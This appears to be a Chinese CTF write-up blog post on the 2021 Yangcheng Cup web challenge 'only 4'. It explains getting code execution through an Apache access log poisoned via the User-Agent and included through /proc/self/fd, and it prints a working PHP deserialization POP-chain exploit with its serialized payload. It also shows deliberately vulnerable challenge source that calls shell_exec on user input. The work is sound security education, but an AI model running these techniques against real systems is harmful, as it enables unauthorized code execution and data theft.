[羊城杯2021]web wp

最新推荐文章于 2023-09-04 00:30:04 发布
最新推荐文章于 2023-09-04 00:30:04 发布
阅读量1.1k 收藏 6
点赞数 2
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l11III1111/article/details/120252859
版权

only 4

题目页面进去就是源码,传入两个参数一个用来包含,一个来触发反序列化。发现有个secret.php但是无法直接包含。但是由于我一开始并不知道要包含的文件是啥卡了很久。之后就只使用文件包含来非预期解了。

<?php
highlight_file('index.php');
error_reporting(0);
$gwht= $_GET["gwht"];
$ycb= $_GET["ycb"];
if(preg_match("/flag/",$gwht)){
    die('hack' );
}
if(preg_match("/secret/",$gwht)){
    die('hack' );
}
include($gwht);
if(isset($ycb)){
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/Flag/",$value)) {
            die('not hit');
            exit();
        }
    }
    $YCB = unserialize($ycb);
}else{
    echo "what are you doing";
}
?>

用dirsearch扫描网站发现啥也没有,尝试直接包含文件读/proc/self/cmdline发现是apache的服务器,尝试读日志/var/log/apache2/access.log无回显,应该是权限不够。

在这里插入图片描述

尝试读取环境变量/proc/self/environ无回显,尝试遍历/proc/self/fd发现error日志和access日志。可以想到使用包含日志getshell但是插入到url中会进行编码无法构造php代码,想到access日志还会记录ua头,尝试将ua头设置成php代码然后包含access日志

/proc/pid/fd 是个目录,包含当前进程打开的每一个文件的文件描述符(file descriptor),这些文件描述符是指向实际文件的一个符号链接
/proc/self/environ 是当前进程的环境变量列表,彼此间用空字符(NULL)隔开;变量用大写字母表示,其值用小写字母表示

在这里插入图片描述

继续尝试发现/proc/self/fd/8为access日志,修改ua头为php代码,包含access日志,成功解析phpinfo

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功执行任意php代码直接读取flag,之后ls发现目录中有一个serialize.php文件,分别读取两个文件

直接用base64输出看看
在这里插入图片描述

在这里插入图片描述

后面其实还有几个考点的都被我跳过了哈哈哈哈

serialize.php,是一个简单反序列化构造pop链,下面我也给出exp,不会反序列化的可以看一下我之前的文章反序列化漏洞

<?php
class start_gg 
{
        public $mod1; 
        public $mod2;
        public function __destruct()
        {
                $this->mod1->test1();
        }
}
class Call 
{
        public $mod1; 
        public $mod2;
        public function test1()
    {
            $this->mod1->test2();
    }
}
class funct 
{
        public $mod1; 
        public $mod2;
        public function __call($test2,$arr)
        {
                $s1 = $this->mod1;
                $s1();
        }
}
class func 
{
        public $mod1; 
        public $mod2;
        public function __invoke()
        {
                $this->mod2 = "字符串拼接".$this->mod1;
        } 
}
class string1 
{
        public $str1;
        public $str2;
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class GetFlag
{

        
        public function get_flag()
        {
                
                echo highlight_file('secret.php');
        }
}
$a = new GetFlag();
$b = new string1();
$b->str1=$a;
$c = new func();
$c->mod1 = $b;
$d = new funct();
$d->mod1 = $c;
$e = new start_gg();
$e->mod1=$d;
echo serialize($e);
//O:8:"start_gg":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}
?>

secret.php,4位命令执行,网上搜也有解法,就是第一步卡住了

<?php
error_reporting(0);
if(strlen($_GET['SXF'])<5){
    echo shell_exec($_GET['SXF']);
}
?>
lu0sf
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[羊城2021] wp
Huamang的博客
09-13 1305
baby_ volatility直接看镜像文件,查看cmd filescan找到有一个ssh.txt 想到之前搭建博客的时候就接触这个ssh密钥,拿去base64decode 找到邮箱,去github找用户 在历史commit里面有个这个??RCTF?? 去分析一下这个__APP__ 里面有html 我直接去kali里面foremost一下 打开后找到了一个隐蔽的flag,真难找。。 U2FuZ0ZvcntTMF8zYXp5XzJfY3JhY2tfbm9vYl9wbGF5ZXJ9 解出 签到
[羊城 2021]Baby_Forenisc
qq_51447967的博客
04-28 729
题目分析 下载得到一个raw后缀的文件,先进行内存分析一下 首先分析镜像的系统版本 得到系统的版本是WinXPSP2x86 然后查看进程 没看到什么重要的进程,在最后有一个DumpIt的进程,尝试dump出来进行Foremost分离之后也没发现什么有用的信息。 然后去查看cmd命令 发现用git命令上传了一些文件,然后把本地的文件删除了,说明信息可能在github上了。 查看特定的文件 可以看到有个ssh.txt文件,联系github中的SSH密钥。将得到的SSH密钥用BASE64解析之后可以发现有
2021羊城CTF wp
qq_45603443的博客
09-12 5599
2021羊城WP(部分) ​Web web1 only 4 def start_flag(s): global stop_threads while True: if stop_threads: break f = io.BytesIO(b'a' * 1024 * 50) url = 'http://192.168.41.134:8000/? gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1' headers = {'Cookie': 'PHPSES
[WP]2021羊城-Web部分
Y4tacker的博客
09-14 1904
文章目录写在前面WebCross The SideCheckin_GoOnly 4 (非预期解法)Only 4 (预期解法)NO SQLEasyCurl 写在前面 这次拿了第一还是比较开心的,一晚上没睡觉… Web Cross The Side 版本信息Laravel v8.26.1 (PHP v7.4.15) 目录扫描 应该是开启了redis 联系版本号,尝试debug-rce 既然有file_get_contents与file_put_contents,尝试ftp passivemode 成功出
2021羊城Web-wp
weixin_45805993的博客
09-12 599
0x01涉及考点 laravel debug cve (CVE-2021-3129) ftp-redis打ssrf 0x02题目分析 扫目录发现一个文件中开启了6379端口和redis的dmp文件,推测要用redis来ssrf 之后了解了CVE-2021-3129 https://xz.aliyun.com/t/9030 大致是Ignition默认提供的vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php中可控f
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
2022年羊城wp
xjh8023的博客
09-04 1898
大赛由中共广州市委网络安全和信息化委员会办公室作为指导单位,广州市网络安全产业促进会主办,广东外语外贸大学、杭州安恒信息技术股份有限公司承办,广州市信息安全测评中心、广州互联网协会协办。 大赛以“网络安全为人民、网络安全靠人民”为主题,旨在通过竞赛的方式提高参赛选手攻防兼备的网络安全实践技能,实现以赛促学、以赛会友,加强不同院校及单位间的技术交流。
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
羊城2023 部分wp
最新发布
weixin_63231007的博客
09-04 2554
D0n't pl4y g4m3!!! & Serpent & Arknights & ez_misc
2021羊城pwn部分wp
eeeeeight的博客
09-12 6516
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
羊城wp
蚁景网安学院
09-23 5408
1PWN1、Babyrop栈溢出,且存在后门函数;利用func1将'/cin/sh'修改为'/bin/sh',利用func2调用参数执行system('/bin/sh')即可#!usr/b...
羊城 2021 web go
F1or_的博客
09-13 271
比赛做不动,靠着赛后复现来学习一下。师傅们tql 一上来就是一个简单的登录页面,题目附件给了源码,打开看看 传入的uname通过text转换为str,一开始我以为是text转换为str的这里可能存在漏洞,上网一搜也没有发现。golang弱比较特性还是比较少,这个方法后面也直接被我排除了,找了好久,哭了。。。 既然这个绕过admin不行,就直接想到修改cookie值来进行身份验证。 全局搜索一下,发现cookie生成代码 这里可以加入一下代码验证一下 但是cookie并没有被解密出来,返还上层发现
2022羊城密码wp
mxx307的博客
09-04 1108
2022羊城密码wp
羊城2021_Re_BabySmc
CHUNJIUJUN的博客
09-21 545
拿到题第一件事查壳、看信息 无壳,64位 IDA,进入主函数 跟进byte_140001085 发现一大推数据,应该是被加密了 IDA动态调试,先F5,然后一路F8,随意输入flag,执行到140001085地址 继续一直F8到出现此对话,Yes 这时程序代码已经自解密了,然后一直按着F8直到程序暂停 重新进行动调,F5,一路F8,随意输入flag后继续F8,F8进去,再F5回去 接着边鼠标向下划边一直按...
羊城 部分wp
akxnxbshai的博客
09-10 504
羊城 wp
羊城2023misc方向完整wp
toto的博客
09-03 2944
misc孤狼~附件链接:https://pan.baidu.com/s/15vAxjMulb39hXfsomMH-pg?pwd=d00b。
web WP
ANYOUZHEN的博客
10-22 465
1. bugku post 安装hackbar,不要花钱去买license,使用hackbar中的2.1.3版本,这个是老版本,但是实际功能差不了多少的,我们进行解压,选择红圈里面的 并且在火狐中进行管理,因为如果不进行管理的话,这个插件会自动的给你更新成要收费的版本,我们把自动更新给他关闭,然后我们进入题目,题目很简单,是一个post,我们根据题目的提示,直接选择post data,将what=flag,发送,flag秒出 ...
2021羊城(部分web
羽的博客
09-12 1595
Only 4 直接包含/proc/self/fd/8可以看到日志,接着把一句话写入UA头中,cat /f*得到flag。 Cross The Side laravel debug rce 参考文章https://whoamianony.top/2021/01/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Laravel/Laravel%20Debug%20mode%20RCE%EF%BC%88CVE-2021-3129%EF%BC%89%E5%88%A9%E7%94%A8%
羊城2020 wp
08-18
羊城2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围方面,羊城2020鼓励团队协作和竞争精神,这对于参赛选手来说是一个很好的机会展现自己的技术能力和团队合作能力。此外,组委会还积极倡导公平竞赛,严禁使用任何形式的作弊或不正当手段来获取胜利,从而保证了比赛的公正性。 羊城2020不仅是一场竞技比赛,还提供了丰厚的奖金和荣誉,吸引了众多顶尖选手参与其中。参赛选手们通过紧张刺激的比赛,展现了他们的技术实力和战术策略。同时,比赛也为电竞爱好者们提供了一个观赏比赛和学习经验的机会,让他们更好地了解电竞运动,提高自己的技术水平。 此外,羊城2020还注重了普及电竞文化的意义。比赛在各个媒体平台上进行直播,使更多的观众能够通过网络或电视观看比赛,增加了电竞的曝光度。通过各种推广活动,羊城2020吸引了更多非电竞爱好者的关注,提高了电竞在社会中的认可度和影响力。 总的来说,羊城2020是一场令人期待的电竞盛事,它不仅展示了顶尖选手们的实力和技巧,也推广了电竞文化并吸引了更多人的关注。这样的比赛将继续推动电竞行业的发展和壮大,为电竞爱好者们带来更多的精彩赛事和娱乐体验。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值